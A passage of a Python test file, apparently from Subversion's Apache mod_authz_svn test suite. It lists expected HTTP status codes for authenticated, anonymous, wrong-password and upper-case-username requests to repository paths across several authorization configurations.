{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, noauthwhenanon_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def authn(sbox):
"test authenticated only access"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn')
write_authz_file(sbox)
authn_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with upper case username for user1
{ 'path': '', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with upper case username for user2
{ 'path': '', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, authn_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def authn_anonoff(sbox):
"test authenticated only access with anonoff"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn-anonoff')
write_authz_file(sbox)
anonoff_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with upper case username for user1
{ 'path': '', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with upper case username for user2
{ 'path': '', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, anonoff_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def authn_lcuser(sbox):
"test authenticated only access with lcuser"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn-lcuser')
write_authz_file(sbox)
lcuser_tests = (
# try with upper case username for user1 (works due to lcuser option)
{ 'path': '', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
# try with upper case username for user2 (works due to lcuser option)
{ 'path': '', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
)
verify_gets(test_area_url, lcuser_tests)
# authenticated access only by group - an excuse to use AuthzSVNAuthoritative Off
# This is terribly messed up: Require group runs after mod_authz_svn,
# so if mod_authz_svn grants the access then it doesn't matter what the group
# requirement says.  If mod_authz_svn rejects the access then the
# AuthzSVNAuthoritative Off directive lets the request fall through to the
# group check.  Overall the behavior of setups like this is almost guaranteed
# to not be what users expect.
@SkipUnless(svntest.main.is_ra_type_dav)
def authn_group(sbox):
"test authenticated only access via groups"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn-group')
# Can't use write_authz_file() like most tests do, because we want to deny all
# access with mod_authz_svn so the tests fall through to the group handling.
authz_name = sbox.authz_name()
svntest.main.write_authz_file(sbox, {
'/': '* =',
})
group_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to the repo, including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
)
verify_gets(test_area_url, group_tests)
# This test exists to validate our behavior when used with the new authz
# provider system introduced in httpd 2.3.x. The Satisfy directive
# determines how older authz hooks are combined and the RequireA(ll|ny)
# blocks handle how new authz providers are combined. The overall results of
# all the authz providers (combined per the Require* blocks) are then
# combined with the other authz hooks via the Satisfy directive.
# Meaning this test requires that mod_authz_svn says yes and there is
# either a valid user or the ALLOW header is 1. The header may seem
# like a silly test but it's easier to exercise than, say, a host directive
# in a repeatable test.
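# (Editorial note: the ALLOW header used below travels through the optional
# 'headers' field of each test dict, which verify_get() forwards verbatim to
# the GET request, so it stands in for whatever extra authz provider the
# httpd config is assumed to consult.)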
@SkipUnless(svntest.main.is_httpd_authz_provider_enabled)
def authn_sallrany(sbox):
"test satisfy all require any config"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/sallrany')
write_authz_file(sbox)
allow_header = { 'ALLOW': '1' }
sallrany_tests = (
# anon access isn't allowed without the ALLOW header
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to the repo, including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
# anon is allowed with the ALLOW header
{ 'path': '', 'status': 301, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'headers': allow_header },
# these 3 tests return 403 instead of 401 because the config allows
# the anon user with the ALLOW header without any auth and the old hook
# system has no way of knowing it should return 401 since authentication is
# configured and can change the behavior. It could decide to return 401 just on
# the basis of authentication being configured but then that leaks info in other
# cases so it's better for this case to be "broken".
{ 'path': '/repos/A/D/H', 'status': 403, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 403, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'headers': allow_header },
# auth is configured and user1 is allowed access to the repo, including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass, 'headers': allow_header },
